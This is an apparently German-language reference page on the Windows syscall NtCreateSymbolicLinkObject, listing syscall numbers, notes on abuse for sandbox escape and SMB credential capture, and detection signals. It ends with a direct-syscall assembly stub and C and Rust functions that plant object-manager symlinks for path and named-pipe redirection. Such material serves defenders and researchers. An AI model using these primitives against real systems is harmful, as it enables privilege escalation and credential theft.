NtCreateSymbolicLinkObject
Erzeugt einen Object-Manager-Symlink von einem Namen zu einem beliebigen NT-Zielstring.
Prototyp
NTSTATUS NtCreateSymbolicLinkObject( PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING LinkTarget );
Argumente
| Name | Type | Dir | Description |
|---|---|---|---|
| LinkHandle | PHANDLE | out | Empfängt das Handle auf das neue Symlink-Objekt. |
| DesiredAccess | ACCESS_MASK | in | Typischerweise SYMBOLIC_LINK_ALL_ACCESS oder SYMBOLIC_LINK_QUERY. |
| ObjectAttributes | POBJECT_ATTRIBUTES | in | Name des Links, optionales RootDirectory und Attribut-Flags. |
| LinkTarget | PUNICODE_STRING | in | NT-Zielpfad, auf den der Link auflöst. Nicht validiert — kann irgendwo im Namensraum zeigen. |
Syscall-IDs pro Windows-Version
| Windows-Version | Syscall-ID | Build |
|---|---|---|
| Win10 1507 | 0xB2 | win10-1507 |
| Win10 1607 | 0xB5 | win10-1607 |
| Win10 1703 | 0xB8 | win10-1703 |
| Win10 1709 | 0xB9 | win10-1709 |
| Win10 1803 | 0xBA | win10-1803 |
| Win10 1809 | 0xBB | win10-1809 |
| Win10 1903 | 0xBC | win10-1903 |
| Win10 1909 | 0xBC | win10-1909 |
| Win10 2004 | 0xC0 | win10-2004 |
| Win10 20H2 | 0xC0 | win10-20h2 |
| Win10 21H1 | 0xC0 | win10-21h1 |
| Win10 21H2 | 0xC1 | win10-21h2 |
| Win10 22H2 | 0xC1 | win10-22h2 |
| Win11 21H2 | 0xC5 | win11-21h2 |
| Win11 22H2 | 0xC6 | win11-22h2 |
| Win11 23H2 | 0xC6 | win11-23h2 |
| Win11 24H2 | 0xC8 | win11-24h2 |
| Server 2016 | 0xB5 | winserver-2016 |
| Server 2019 | 0xBB | winserver-2019 |
| Server 2022 | 0xC4 | winserver-2022 |
| Server 2025 | 0xC8 | winserver-2025 |
Kernel-Modul
Verwandte APIs
Syscall-Stub
4C 8B D1 mov r10, rcx B8 C8 00 00 00 mov eax, 0xC8 F6 04 25 08 03 FE 7F 01 test byte ptr [0x7FFE0308], 1 75 03 jne short +3 0F 05 syscall C3 ret CD 2E int 2Eh C3 ret
Undokumentierte Hinweise
SSN driftet von `0xB2` (1507) zu `0xC8` (24H2); dynamisch auflösen, wenn mehrere Builds anvisiert werden. Object-Manager-Symlinks unterscheiden sich vollständig von NTFS-Symlinks / Reparse Points — sie leben im in-memory Object-Namensraum und werden bei der Namensauflösung lazy ausgewertet. Die in Explorer sichtbaren DOS-Buchstaben (`C:`, `D:`) sind tatsächlich Symlinks `\\??\\C: -> \\Device\\HarddiskVolume3`, die der Session Manager pflanzt. Symlinks im per-Session `\\??` zu erstellen verlangt normalerweise nur DIRECTORY_CREATE_OBJECT auf diesem Verzeichnis (unprivilegiert aus einer normalen interaktiven Session); im `\\GLOBAL??` oder mit OBJ_PERMANENT braucht es SeCreateSymbolicLinkPrivilege (Default für Admins).
Häufige Malware-Nutzung
Die offensive Vorzeige-Primitive für **Sandbox-Escape**: `\\??\\X -> \\??\\C:` (oder beliebig) ins per-Session DOS-Device-Verzeichnis pflanzen, jeder nachfolgende Pfad-Lookup, der den Link trifft, wird umgeleitet. CVE-2019-0808-Familie missbrauchte exakt dieses Muster, um privilegierte Dienste zum Schreiben in angreifer-kontrollierte Pfade zu zwingen. Mit `NtFsControlFile(FSCTL_SET_REPARSE_POINT)` für NTFS-Mountpoint-Redirection (Forshaws symboliclink-testing-tools) kombiniert ergeben sich vollständige Filesystem-Redirection-Ketten. CTF-Klassiker, weil die Primitive für jeden Prozess unprivilegiert erreichbar ist, der `\\??` mit CREATE_OBJECT öffnen kann. Moderne Varianten: `\\??\\NamedPipe\\...` (Pipe-Redirect pflanzen, damit ein authentifizierter SMB-Client zur Named Pipe des Angreifers verbindet und Credentials offenlegt), und `\\??\\GLOBALROOT\\Device\\...`-Exposition (per-Session-Symlink, der den GLOBALROOT-Pfadfilter vieler Sandboxes umgeht).
Erkennungsmöglichkeiten
Symlink-Erzeugung durch Nicht-System-Prozesse ist selten und sehr wertvolle Telemetrie. Sysmon protokolliert es nicht direkt, aber **kernelseitiges ObRegisterCallbacks auf `IoSymbolicLinkObjectType`** fängt jede Erzeugung an der Quelle ab. Microsoft Defender for Endpoint hat seit ~2020 eine Verhaltensregel, die Symlink-Erzeugungen von Medium-IL-Prozessen nach `\\??` markiert, die zurück auf `\\??\\C:` oder `\\Device\\Harddisk*` zeigen. ETW Microsoft-Windows-Kernel-Audit-API-Calls macht es ebenfalls sichtbar. Stärkstes Signal: **ein Nicht-Admin-Prozess erstellt einen Symlink, dessen Ziel mit `\\Device\\`, `\\??\\GLOBALROOT\\` oder einem anderen `\\??\\`-Buchstaben beginnt** — diese Redirection-Muster gibt es in legitimer Software praktisch nicht.
Direkte Syscall-Beispiele
asmx64 direct stub (Win11 24H2)
; Direct syscall stub for NtCreateSymbolicLinkObject (SSN 0xC8, Win11 24H2)
NtCreateSymbolicLinkObject PROC
mov r10, rcx ; syscall convention
mov eax, 0C8h ; SSN (BUILD-SPECIFIC, resolve dynamically)
syscall
ret
NtCreateSymbolicLinkObject ENDPcPlant \??\X -> \??\C: for path redirection
// Plant an object-manager symlink: \??\X -> \??\C:
// A subsequent CreateFile("X:\\Users\\victim\\...") will resolve through the
// link and hit the chosen target. Used as a stepping stone in CVE-2019-0808
// -style sandbox-escape chains.
#include <windows.h>
#include <winternl.h>
#define SYMBOLIC_LINK_ALL_ACCESS 0xF0001
#define OBJ_CASE_INSENSITIVE 0x00000040
typedef NTSTATUS (NTAPI *pNtCreateSymbolicLinkObject)(
PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PUNICODE_STRING);
BOOL PlantDriveSymlink(WCHAR letter, PCWSTR target) {
pNtCreateSymbolicLinkObject NtCreateSymbolicLinkObject =
(pNtCreateSymbolicLinkObject)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtCreateSymbolicLinkObject");
WCHAR path[16];
swprintf_s(path, 16, L"\\??\\%lc", letter);
UNICODE_STRING usName; RtlInitUnicodeString(&usName, path);
UNICODE_STRING usTgt; RtlInitUnicodeString(&usTgt, target);
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);
HANDLE hLink = NULL;
NTSTATUS s = NtCreateSymbolicLinkObject(
&hLink, SYMBOLIC_LINK_ALL_ACCESS, &oa, &usTgt);
return NT_SUCCESS(s);
}rustNamedPipe symlink for SMB credential capture
// Cargo: ntapi = "0.4", widestring = "1"
// Plant \??\PIPE\srvsvc -> \??\PIPE\attacker so that an authenticated SMB
// client connecting via UNC \\victim\IPC$\srvsvc lands on the attacker's pipe.
// Used in NTLM-relay and credential-coercion PoCs.
use ntapi::ntobapi::NtCreateSymbolicLinkObject;
use ntapi::ntrtl::RtlInitUnicodeString;
use winapi::shared::ntdef::{OBJECT_ATTRIBUTES, UNICODE_STRING};
use widestring::U16CString;
pub unsafe fn plant_pipe_symlink(name: &str, target: &str) -> bool {
let wn = U16CString::from_str(name).unwrap();
let wt = U16CString::from_str(target).unwrap();
let mut usn: UNICODE_STRING = std::mem::zeroed();
let mut ust: UNICODE_STRING = std::mem::zeroed();
RtlInitUnicodeString(&mut usn, wn.as_ptr());
RtlInitUnicodeString(&mut ust, wt.as_ptr());
let mut oa: OBJECT_ATTRIBUTES = std::mem::zeroed();
oa.Length = std::mem::size_of::<OBJECT_ATTRIBUTES>() as u32;
oa.ObjectName = &mut usn;
oa.Attributes = 0x40; // OBJ_CASE_INSENSITIVE
let mut h: isize = 0;
let s = NtCreateSymbolicLinkObject(&mut h as *mut _ as _, 0xF0001, &mut oa, &mut ust);
s >= 0
}MITRE ATT&CK-Mappings
Last verified: 2026-05-20